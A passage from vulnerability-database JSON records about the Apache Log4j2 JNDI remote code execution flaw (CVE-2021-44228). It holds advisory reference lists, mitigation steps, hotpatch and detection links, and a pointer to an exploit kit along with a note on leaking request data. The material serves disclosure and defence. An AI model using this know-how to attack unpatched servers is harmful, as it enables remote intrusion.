"https://nvd.nist.gov/vuln/detail/cve-2018-25012" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-35522" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-35524" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-27645" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-33574" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-13435" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-5827" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-24370" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-43527" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-14145" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-13751" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-25014" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-19603" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-25012" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-35521" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-35942" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-17594" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3572" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-12762" }, { "trust": 0.3, 
"url": "https://access.redhat.com/security/cve/cve-2021-36086" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-22898" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-16135" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-36084" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-37136" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-17541" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3800" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-36087" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-36331" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3712" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-31535" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3445" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-22925" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-36330" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-20232" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-20266" }, { "trust": 0.3, "url": 
"https://access.redhat.com/security/cve/cve-2019-20838" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-22876" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-20231" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-36332" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-14155" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-36085" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-37137" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-21409" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-33560" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-17595" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3481" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-42574" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-25009" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-25010" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2020-35523" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-28153" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2019-13750" }, { "trust": 0.3, "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3426" }, { "trust": 0.3, "url": 
"https://access.redhat.com/security/cve/cve-2019-18218" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2021-3580" }, { "trust": 0.3, "url": "https://issues.jboss.org/):" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2021-20317" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2021-43267" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2021-45046" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45046" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5138" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3778" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-23841" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5128" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2018-20673" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-23840" }, { "trust": 0.1, "url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-3796" }, { "trust": 0.1, "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html" }, { "trust": 0.1, "url": 
"https://access.redhat.com/errata/rhsa-2021:5127" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5129" }, { "trust": 0.1, "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html" }, { "trust": 0.1, "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5126" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=red.hat.integration\u0026version" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5133" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5140" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4" }, { "trust": 0.1, "url": "https://access.redhat.com/solutions/6577421" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.21.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.20.04.1" }, { "trust": 0.1, "url": "https://ubuntu.com/security/notices/usn-5197-1" }, { "trust": 0.1, 
"url": "https://launchpad.net/ubuntu/+source/apache-log4j2/2.16.0-0.21.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4104" }, { "trust": 0.1, "url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-4104" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2021:5148" }, { "trust": 0.1, "url": "https://ubuntu.com/security/notices/usn-5192-1" }, { "trust": 0.1, "url": "https://ubuntu.com/security/notices/usn-5192-2" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44832" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.09.0" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.10.0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45105" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-45105" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2022:0203" }, { "trust": 0.1, "url": 
"https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=jboss.fuse\u0026version=7.08.0" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2021-44832" }, { "trust": 0.1, "url": "https://www.vmware.com/security/advisories/vmsa-2021-0028.html" }, { "trust": 0.1, "url": "http://lists.vmware.com/mailman/listinfo/security-announce" }, { "trust": 0.1, "url": "https://lists.vmware.com/mailman/listinfo/security-announce." } ], "sources": [ { "db": "VULHUB", "id": "VHN-407408" }, { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165324" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165348" }, { "db": "PACKETSTORM", "id": "165632" }, { "db": "PACKETSTORM", "id": "165371" }, { "db": "CNNVD", "id": "CNNVD-202112-799" }, { "db": "NVD", "id": "CVE-2021-44228" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-407408" }, { "db": "VULMON", "id": "CVE-2021-44228" }, { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165324" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165348" }, { "db": "PACKETSTORM", "id": "165632" }, { "db": "PACKETSTORM", "id": "165371" }, { "db": 
"CNNVD", "id": "CNNVD-202112-799" }, { "db": "NVD", "id": "CVE-2021-44228" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-12-10T00:00:00", "db": "VULHUB", "id": "VHN-407408" }, { "date": "2021-12-10T00:00:00", "db": "VULMON", "id": "CVE-2021-44228" }, { "date": "2021-12-15T15:26:54", "db": "PACKETSTORM", "id": "165295" }, { "date": "2021-12-15T15:20:33", "db": "PACKETSTORM", "id": "165286" }, { "date": "2021-12-15T15:20:43", "db": "PACKETSTORM", "id": "165287" }, { "date": "2021-12-15T15:22:36", "db": "PACKETSTORM", "id": "165288" }, { "date": "2021-12-15T15:23:16", "db": "PACKETSTORM", "id": "165289" }, { "date": "2021-12-15T15:27:51", "db": "PACKETSTORM", "id": "165297" }, { "date": "2021-12-15T15:28:00", "db": "PACKETSTORM", "id": "165298" }, { "date": "2021-12-16T15:20:38", "db": "PACKETSTORM", "id": "165324" }, { "date": "2021-12-16T15:25:46", "db": "PACKETSTORM", "id": "165329" }, { "date": "2021-12-17T14:06:52", "db": "PACKETSTORM", "id": "165348" }, { "date": "2022-01-20T17:49:05", "db": "PACKETSTORM", "id": "165632" }, { "date": "2021-12-20T16:19:51", "db": "PACKETSTORM", "id": "165371" }, { "date": "2021-12-10T00:00:00", "db": "CNNVD", "id": "CNNVD-202112-799" }, { "date": "2021-12-10T10:15:09.143000", "db": "NVD", "id": "CVE-2021-44228" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-06T00:00:00", "db": "VULHUB", "id": "VHN-407408" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2021-44228" }, { "date": "2023-04-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202112-799" }, { "date": "2024-11-21T06:30:38.047000", "db": "NVD", "id": "CVE-2021-44228" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165348" }, { "db": "PACKETSTORM", "id": "165371" }, { "db": "CNNVD", "id": "CNNVD-202112-799" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apache Log4j Code problem vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-202112-799" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code execution", "sources": [ { "db": "PACKETSTORM", "id": "165295" }, { "db": "PACKETSTORM", "id": "165286" }, { "db": "PACKETSTORM", "id": "165287" }, { "db": "PACKETSTORM", "id": "165288" }, { "db": "PACKETSTORM", "id": "165289" }, { "db": "PACKETSTORM", "id": "165297" }, { "db": "PACKETSTORM", "id": "165298" }, { "db": "PACKETSTORM", "id": "165329" }, { "db": "PACKETSTORM", "id": "165632" }, { "db": "PACKETSTORM", "id": "165371" } ], "trust": 1.0 } }
gsd-2021-44228
Vulnerability from gsd
{ "GSD": { "affected_component": "unspecified", "alias": "CVE-2021-44228", "attack_vector": "network", "credit": "", "description": "This vulnerability was not correctly fixed \"in certain non-default configuration\" and a new vulnerability and patch have been released, please see GSD-2021-1002353 (CVE-2021-45046). Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. \n\n In log4j 2.15.1 and later JNDI will be disabled by default: \n\n \"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it. Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.\" (https://issues.apache.org/jira/browse/LOG4J2-3208) \n\n In previous releases (\u003e2.10) this behavior can be mitigated by setting system property \"log4j2.formatMsgNoLookups\" to \"true\" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting \"com.sun.jndi.rmi.object.trustURLCodebase\" and \"com.sun.jndi.cosnaming.object.trustURLCodebase\" to \"false\". 
\n\n Later versions of the Oracle Java JDK are not affected by the LDAP attack vector, but other vectors are available for exploitation: \"JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector but please note this still leaves other attack vectors. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to \"false\" meaning JNDI cannot load remote code using LDAP.\" (https://www.lunasec.io/docs/blog/log4j-zero-day/) \n\n Also please note that although log4j version 1.x is not affected by this specific vulnerability, it does have a number of known serious security flaws and likely also contains Remote Code Execution vulnerabilities; upgrading it should be investigated. \n\n Hot patches: \n\n There are currently several projects providing hot patches that can modify a running system to remove the vulnerability and are open-source licensed, allowing them to be easily audited: \n\n Log4jHotPatch \n\n \"This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process. The dynamic and static agents are known to run on JDK 8 \u0026 11 on Linux whereas on JDK 17 only the static agent is working (see below)\" (https://github.com/corretto/hotpatch-for-apache-log4j2) \n\n Logout4Shell \n\n \"However, enabling these system property requires access to the vulnerable servers as well as a restart. 
The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this server.\" (https://github.com/Cybereason/Logout4Shell) \n\n Detection \n\n Please see the GSD reference links tagged with \"DETECTION\" for more information (there are too many to list here). \n\n TOP LINKS: \n\n Best list of vulnerable software: https://github.com/NCSC-NL/log4shell/tree/main/software\n\n Best list of vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface \n\n Best hotpatch:\n\n https://github.com/corretto/hotpatch-for-apache-log4j2 \n\n Best detection:\n\n grep: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n\n jarhashes: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes \n\n semgrep: https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/\n\n yara: https://github.com/timb-machine/log4j/\n\n burpsuite: https://github.com/silentsignal/burp-log4shell \n\n Nmap NSE: https://github.com/Diverto/nse-log4shell\n\n Scanners: \n https://github.com/alexbakker/log4shell-tools\n https://github.com/fullhunt/log4j-scan\n https://github.com/takito1812/log4j-detect\n\nExploitation: \n\n An exploit kit is available at https://github.com/pimps/JNDI-Exploit-Kit and it has also been reported that omitting the closing } can result in data from other requests being sent as some servers with log4j2 will apparently keep sending data until they find a closing }.", "id": "GSD-2021-44228", "impact": "remote code execution", "modified": "2022-09-03T22:57:05Z", "notes": "", "product_name": [ "Log4j", "Log4j2" ], "product_version": "\u003c=2.14.1", "references": [ { "type": "EVIDENCE", "url": "https://www.suse.com/security/cve/CVE-2021-44228.html" }, { "type": "EVIDENCE", "url": 
"https://www.debian.org/security/2021/dsa-5020" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2022:0296" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2022:0203" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2022:0082" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5148" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5141" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5140" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5138" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5137" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5134" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5133" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5132" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5130" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5129" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5128" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5127" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5126" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5108" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5106" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5094" }, { "type": "EVIDENCE", "url": "https://access.redhat.com/errata/RHSA-2021:5093" }, { "type": "EVIDENCE", "url": "https://ubuntu.com/security/CVE-2021-44228" }, { "type": "EVIDENCE", "url": "https://advisories.mageia.org/CVE-2021-44228.html" }, { "type": "EVIDENCE", "url": 
"https://security.archlinux.org/CVE-2021-44228" }, { "type": "EVIDENCE", "url": "https://alas.aws.amazon.com/cve/html/CVE-2021-44228.html" }, { "type": "EVIDENCE", "url": "https://packetstormsecurity.com/files/cve/CVE-2021-44228" }, { "name": "https://twitter.com/stereotype32/status/1469313856229228544", "type": "EVIDENCE", "url": "https://twitter.com/stereotype32/status/1469313856229228544" }, { "name": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/", "type": "EVIDENCE", "url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/" }, { "name": "Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package", "type": "EVIDENCE", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "name": "https://github.com/tangxiaofeng7/apache-log4j-poc", "type": "EVIDENCE", "url": "https://github.com/tangxiaofeng7/apache-log4j-poc" }, { "name": "https://news.ycombinator.com/item?id=29504755", "type": "EVIDENCE", "url": "https://news.ycombinator.com/item?id=29504755" }, { "name": "https://twitter.com/P0rZ9/status/1468949890571337731", "type": "EVIDENCE", "url": "https://twitter.com/P0rZ9/status/1468949890571337731" }, { "name": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/", "type": "FIX", "url": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/" }, { "name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/", "type": "EVIDENCE", "url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/" }, { "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce", "type": "EVIDENCE", "url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce" }, { "name": 
"http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E", "type": "EVIDENCE", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E" }, { "name": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html", "type": "EVIDENCE", "url": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html" }, { "content": "Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2.", "name": "https://github.com/simonis/Log4jPatch", "type": "FIX", "url": "https://github.com/simonis/Log4jPatch" }, { "content": "This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process.", "name": "Log4jHotPatch", "type": "FIX", "url": "https://github.com/corretto/hotpatch-for-apache-log4j2" }, { "content": "We recommend that those running affected applications upgrade Log4j to version 2.15 to address this vulnerability. However, this isn\u2019t always quick, so folks from the Coretto team spent some time building a tool to hotpatch vulnerable log4j deployments. This tool is designed to hotpatch a running JVM using any Log4j 2.0+. The tool is idempotent, meaning that you can run this multiple times on the same JVM without changing the result past the initial application. This tool also looks for all the running JVMs and attempts to mitigate the vulnerability. 
You can also use this to patch shaded jars that include log4j as a dependency, and to patch multiple log4j instances on the classpath.", "name": "Hotpatch for Apache Log4j", "type": "EVIDENCE", "url": "https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/" }, { "name": "https://github.com/YfryTchsGD/Log4jAttackSurface", "type": "EVIDENCE", "url": "https://github.com/YfryTchsGD/Log4jAttackSurface" }, { "name": "https://twitter.com/halvarflake/status/1469318326929272835", "type": "EVIDENCE", "url": "https://twitter.com/halvarflake/status/1469318326929272835" }, { "name": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", "type": "EVIDENCE", "url": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b" }, { "name": "https://twitter.com/_JohnHammond/status/1469255402290401285", "type": "EVIDENCE", "url": "https://twitter.com/_JohnHammond/status/1469255402290401285" }, { "name": "https://logging.apache.org/log4j/2.x/manual/lookups.html", "type": "EVIDENCE", "url": "https://logging.apache.org/log4j/2.x/manual/lookups.html" }, { "name": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf", "type": "EVIDENCE", "url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" }, { "content": "JNDI (Java Naming and Directory Interface) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services such as RMI, CORBA, LDAP, or DNS.\n\nThis talk will present a new type of vulnerability named \"JNDI Reference Injection\" found on malware samples attacking Java Applets (CVE-2015-4902). The same principles can be applied to attack web applications running JNDI lookups on names controlled by attackers. 
As we will demo during the talk, attackers will be able to use different techniques to run arbitrary code on the server performing JNDI lookups.\n\nThe talk will first present the basics of this new vulnerability including the underlying technology, and will then explain in depth the different ways an attacker can exploit it using different vectors and services. We will focus on exploiting RMI, LDAP and CORBA services as these are present in almost every Enterprise application.\n\nLDAP offers an alternative attack vector where attackers not able to influence the address of an LDAP lookup operation may still be able to modify the LDAP directory in order to store objects that will execute arbitrary code upon retrieval by the application lookup operation. This may be exploited through LDAP manipulation or simply by modifying LDAP entries as some Enterprise directories allow.", "name": "A JOURNEY FROM JNDI/LDAP MANIPULATION TO REMOTE CODE EXECUTION DREAM LAND", "tags": [ "timeline" ], "timestamp": "2016-08-03", "type": "EVIDENCE", "url": 